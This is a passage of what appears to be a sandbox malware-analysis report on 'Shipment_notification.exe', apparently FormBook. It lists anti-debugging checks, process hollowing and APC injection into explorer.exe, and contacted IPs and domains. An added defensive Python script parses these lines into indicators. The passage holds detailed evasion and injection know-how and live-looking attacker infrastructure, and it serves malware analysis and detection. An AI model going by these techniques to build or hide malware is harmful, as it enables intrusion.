Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov eax, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_01B7B8D0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFB02A mov eax, dword ptr fs:[00000030h] 2_2_01AFB02A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1002D mov eax, dword ptr fs:[00000030h] 2_2_01B1002D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67016 mov eax, dword ptr fs:[00000030h] 2_2_01B67016
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB4015 mov eax, dword ptr fs:[00000030h] 2_2_01BB4015
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA2073 mov eax, dword ptr fs:[00000030h] 2_2_01BA2073
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB1074 mov eax, dword ptr fs:[00000030h] 2_2_01BB1074
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B00050 mov eax, dword ptr fs:[00000030h] 2_2_01B00050
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14BAD mov eax, dword ptr fs:[00000030h] 2_2_01B14BAD
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB5BA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB5BA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF1B8F mov eax, dword ptr fs:[00000030h] 2_2_01AF1B8F
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1B390 mov eax, dword ptr fs:[00000030h] 2_2_01B1B390
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12397 mov eax, dword ptr fs:[00000030h] 2_2_01B12397
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA138A mov eax, dword ptr fs:[00000030h] 2_2_01BA138A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B9D380 mov ecx, dword ptr fs:[00000030h] 2_2_01B9D380
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B103E2 mov eax, dword ptr fs:[00000030h] 2_2_01B103E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0DBE9 mov eax, dword ptr fs:[00000030h] 2_2_01B0DBE9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B653CA mov eax, dword ptr fs:[00000030h] 2_2_01B653CA
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA131B mov eax, dword ptr fs:[00000030h] 2_2_01BA131B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B13B7A mov eax, dword ptr fs:[00000030h] 2_2_01B13B7A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEDB60 mov ecx, dword ptr fs:[00000030h] 2_2_01AEDB60
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8B58 mov eax, dword ptr fs:[00000030h] 2_2_01BB8B58
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEDB40 mov eax, dword ptr fs:[00000030h] 2_2_01AEDB40
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEF358 mov eax, dword ptr fs:[00000030h] 2_2_01AEF358
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1FAB0 mov eax, dword ptr fs:[00000030h] 2_2_01B1FAB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE52A5 mov eax, dword ptr fs:[00000030h] 2_2_01AE52A5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFAAB0 mov eax, dword ptr fs:[00000030h] 2_2_01AFAAB0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1D294 mov eax, dword ptr fs:[00000030h] 2_2_01B1D294
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12AE4 mov eax, dword ptr fs:[00000030h] 2_2_01B12AE4
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12ACB mov eax, dword ptr fs:[00000030h] 2_2_01B12ACB
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B24A2C mov eax, dword ptr fs:[00000030h] 2_2_01B24A2C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF8A0A mov eax, dword ptr fs:[00000030h] 2_2_01AF8A0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B03A1C mov eax, dword ptr fs:[00000030h] 2_2_01B03A1C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEAA16 mov eax, dword ptr fs:[00000030h] 2_2_01AEAA16
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE5210 mov eax, dword ptr fs:[00000030h] 2_2_01AE5210
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE5210 mov ecx, dword ptr fs:[00000030h] 2_2_01AE5210
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2927A mov eax, dword ptr fs:[00000030h] 2_2_01B2927A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B9B260 mov eax, dword ptr fs:[00000030h] 2_2_01B9B260
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8A62 mov eax, dword ptr fs:[00000030h] 2_2_01BB8A62
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B74257 mov eax, dword ptr fs:[00000030h] 2_2_01B74257
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE9240 mov eax, dword ptr fs:[00000030h] 2_2_01AE9240
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B11DB5 mov eax, dword ptr fs:[00000030h] 2_2_01B11DB5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B135A1 mov eax, dword ptr fs:[00000030h] 2_2_01B135A1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB05AC mov eax, dword ptr fs:[00000030h] 2_2_01BB05AC
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE2D8A mov eax, dword ptr fs:[00000030h] 2_2_01AE2D8A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1FD9B mov eax, dword ptr fs:[00000030h] 2_2_01B1FD9B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B12581 mov eax, dword ptr fs:[00000030h] 2_2_01B12581
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B98DF1 mov eax, dword ptr fs:[00000030h] 2_2_01B98DF1
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFD5E0 mov eax, dword ptr fs:[00000030h] 2_2_01AFD5E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov eax, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01B66DC9
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B6A537 mov eax, dword ptr fs:[00000030h] 2_2_01B6A537
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h] 2_2_01B14D3B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8D34 mov eax, dword ptr fs:[00000030h] 2_2_01BB8D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h] 2_2_01AF3D34
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AEAD30 mov eax, dword ptr fs:[00000030h] 2_2_01AEAD30
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h] 2_2_01B0C577
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B07D50 mov eax, dword ptr fs:[00000030h] 2_2_01B07D50
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B23D43 mov eax, dword ptr fs:[00000030h] 2_2_01B23D43
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B63540 mov eax, dword ptr fs:[00000030h] 2_2_01B63540
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF849B mov eax, dword ptr fs:[00000030h] 2_2_01AF849B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA14FB mov eax, dword ptr fs:[00000030h] 2_2_01BA14FB
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h] 2_2_01B66CF0
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8CD6 mov eax, dword ptr fs:[00000030h] 2_2_01BB8CD6
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1BC2C mov eax, dword ptr fs:[00000030h] 2_2_01B1BC2C
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h] 2_2_01BB740D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h] 2_2_01BA1C06
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B66C0A mov eax, dword ptr fs:[00000030h] 2_2_01B66C0A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0746D mov eax, dword ptr fs:[00000030h] 2_2_01B0746D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h] 2_2_01B7C450
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A44B mov eax, dword ptr fs:[00000030h] 2_2_01B1A44B
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B67794 mov eax, dword ptr fs:[00000030h] 2_2_01B67794
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF8794 mov eax, dword ptr fs:[00000030h] 2_2_01AF8794
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B237F5 mov eax, dword ptr fs:[00000030h] 2_2_01B237F5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AE4F2E mov eax, dword ptr fs:[00000030h] 2_2_01AE4F2E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1E730 mov eax, dword ptr fs:[00000030h] 2_2_01B1E730
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B0F716 mov eax, dword ptr fs:[00000030h] 2_2_01B0F716
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7FF10 mov eax, dword ptr fs:[00000030h] 2_2_01B7FF10
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h] 2_2_01BB070D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB070D mov eax, dword ptr fs:[00000030h] 2_2_01BB070D
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h] 2_2_01B1A70E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B1A70E mov eax, dword ptr fs:[00000030h] 2_2_01B1A70E
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFFF60 mov eax, dword ptr fs:[00000030h] 2_2_01AFFF60
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB8F6A mov eax, dword ptr fs:[00000030h] 2_2_01BB8F6A
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AFEF40 mov eax, dword ptr fs:[00000030h] 2_2_01AFEF40
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B646A7 mov eax, dword ptr fs:[00000030h] 2_2_01B646A7
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB0EA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB0EA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01BB0EA5 mov eax, dword ptr fs:[00000030h] 2_2_01BB0EA5
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7FE87 mov eax, dword ptr fs:[00000030h] 2_2_01B7FE87
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01AF76E2 mov eax, dword ptr fs:[00000030h] 2_2_01AF76E2
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B116E0 mov ecx, dword ptr fs:[00000030h] 2_2_01B116E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0040CEE3 LdrLoadDll, 2_2_0040CEE3
Source: C:\Users\user\Desktop\Shipment_notification.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 206.54.190.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.218.155.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tcatelier.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.223 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.114.105.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.carcosainvest.com
Source: C:\Windows\explorer.exe Domain query: www.locationsbormes.com
Source: C:\Windows\explorer.exe Domain query: www.peramid.xyz
Source: C:\Windows\explorer.exe Network Connect: 198.177.124.57 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.piergitarshoes.com
Source: C:\Windows\explorer.exe Domain query: www.emagrecarapido.store
Source: C:\Windows\explorer.exe Domain query: www.isabellagambitta.com
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 66.96.161.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ywtxsm.com
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.drkathleensanders.com
Source: C:\Users\user\Desktop\Shipment_notification.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 880000 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Memory written: C:\Users\user\Desktop\Shipment_notification.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
Source: explorer.exe, 00000003.00000000.353184774.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536066000.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.562430568.00000000086B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.580886063.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.343710341.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.577680371.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.339413260.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
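The evidence lines above are the actionable part of this report for a responder, but they are spread over several categories: the `mov eax, dword ptr fs:[00000030h]` hits are reads of the PEB pointer in the TEB (used for `BeingDebugged`/`NtGlobalFlag` checks and, given the `LdrLoadDll` call, for walking the loader list to resolve imports), `Process queried: DebugPort` is `NtQueryInformationProcess(ProcessDebugPort)`, and the `Section unmapped` / `Memory written ... 4D5A` / `Thread register set` / `Thread APC queued` lines are the hollowing and APC-injection chain that ends with explorer.exe (located via the `Progman` / `Shell_TrayWnd` window strings) doing the network traffic. The script below is an added example written for this page, not Joe Sandbox's own tooling: it parses a handful of evidence lines copied from the report into structured events, collapses the repeated per-function PEB hits, pulls the network IOCs out of the injected explorer.exe, and labels the injection primitives. The sample input and the `Source: <actor> <Action>: <detail> [Jump to behavior]` layout it assumes are taken from the lines above; the technique labels in `classify` are my own heuristic, not a report field.

```python
import re
from collections import defaultdict

# Constructed sample input: evidence lines copied from the report section above.
# Assumption: every line has the shape "Source: <actor> <Action>: <detail> [Jump to behavior]".
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h] 2_2_01B7C450
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B7C450 mov eax, dword ptr fs:[00000030h] 2_2_01B7C450
Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B116E0 mov ecx, dword ptr fs:[00000030h] 2_2_01B116E0
Source: C:\Users\user\Desktop\Shipment_notification.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.54.190.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tcatelier.com
Source: C:\Windows\explorer.exe Network Connect: 154.218.155.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.peramid.xyz
Source: C:\Users\user\Desktop\Shipment_notification.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 880000 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Memory written: C:\Users\user\Desktop\Shipment_notification.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3324 Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe Jump to behavior
"""

# Actor is a path without spaces; the action is the shortest run of words before a colon;
# the trailing "Jump to behavior" link label is dropped.
EVIDENCE_RE = re.compile(
    r"^Source:\s+(?P<actor>\S+)\s+(?P<action>[A-Za-z][A-Za-z ]*?):\s+(?P<detail>.*?)"
    r"(?:\s+Jump to behavior)?\s*$"
)
# fs:[30h] is the PEB pointer in the 32-bit TEB; one hit per occurrence, so functions repeat.
PEB_RE = re.compile(r"^(?P<func>\d+_\d+_[0-9A-Fa-f]+)\s+mov\s+\w+,\s*dword ptr fs:\[0*30h\]")


def parse_evidence(text):
    """Turn report lines into dicts with actor / action / detail; skip anything else."""
    events = []
    for raw in text.splitlines():
        m = EVIDENCE_RE.match(raw.strip())
        if m:
            events.append(m.groupdict())
    return events


def peb_readers(events):
    """Distinct functions that read the PEB (anti-debug checks or manual import resolution)."""
    funcs = set()
    for e in events:
        if e["action"] == "Code function":
            m = PEB_RE.match(e["detail"])
            if m:
                funcs.add(m.group("func"))
    return sorted(funcs)


def debugport_queriers(events):
    """Processes that called NtQueryInformationProcess(ProcessDebugPort)."""
    return sorted({e["actor"] for e in events
                   if e["action"] == "Process queried" and e["detail"] == "DebugPort"})


def network_iocs(events):
    """ip:port pairs and domains per connecting process (explorer.exe here, i.e. injected code)."""
    iocs = defaultdict(lambda: {"ips": set(), "domains": set()})
    for e in events:
        if e["action"] == "Network Connect":
            ip, port = e["detail"].split()
            iocs[e["actor"]]["ips"].add(f"{ip}:{port}")
        elif e["action"] == "Domain query":
            iocs[e["actor"]]["domains"].add(e["detail"])
    return {a: {k: sorted(v) for k, v in d.items()} for a, d in iocs.items()}


def injection_chain(events):
    """Cross-process primitives observed per injecting process."""
    chain = defaultdict(set)
    for e in events:
        a, d, who = e["action"], e["detail"], e["actor"]
        if a == "Section unmapped":
            chain[who].add("unmap")
        elif a == "Section loaded" and "execute" in d and "write" in d:
            chain[who].add("rwx_map")
        elif a == "Memory written" and "value starts with: 4D5A" in d:
            chain[who].add("pe_write")        # 4D5A == "MZ": a full PE image, not raw shellcode
        elif a == "Thread APC queued":
            chain[who].add("apc")
        elif a == "Thread register set":
            chain[who].add("set_context")
        elif a == "Process created" and d.startswith(who):
            chain[who].add("self_spawn")      # suspended copy of itself to hollow
    return {k: sorted(v) for k, v in chain.items()}


def classify(primitives):
    """Heuristic labels (mine, not a report field) for a primitive set from injection_chain."""
    p, labels = set(primitives), []
    if {"unmap", "pe_write", "set_context"} <= p:
        labels.append("process hollowing")   # unmap image, write MZ, redirect thread
    if "apc" in p:
        labels.append("APC injection")
    if "rwx_map" in p:
        labels.append("RWX section mapped into foreign process")
    return labels


if __name__ == "__main__":
    ev = parse_evidence(SAMPLE_LINES)
    print("PEB readers:", peb_readers(ev))
    print("DebugPort queried by:", debugport_queriers(ev))
    for actor, prims in injection_chain(ev).items():
        print(actor, prims, classify(prims))
    print("network IOCs:", network_iocs(ev))
```

Two caveats when turning the output into blocks or detections. The IOC list belongs to explorer.exe, not to the sample: a rule keyed on the sample's image name misses the beaconing, so the useful telemetry is explorer.exe opening outbound port 80 shortly after a non-shell process mapped an RWX section into it or queued an APC in it. And FormBook contacts a batch of domains of which only one is live C2, with the others acting as decoys; the `www.*` domains above are worth alerting on, but treat them as a set to be vetted rather than a confirmed C2 list.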
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Users\user\Desktop\Shipment_notification.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
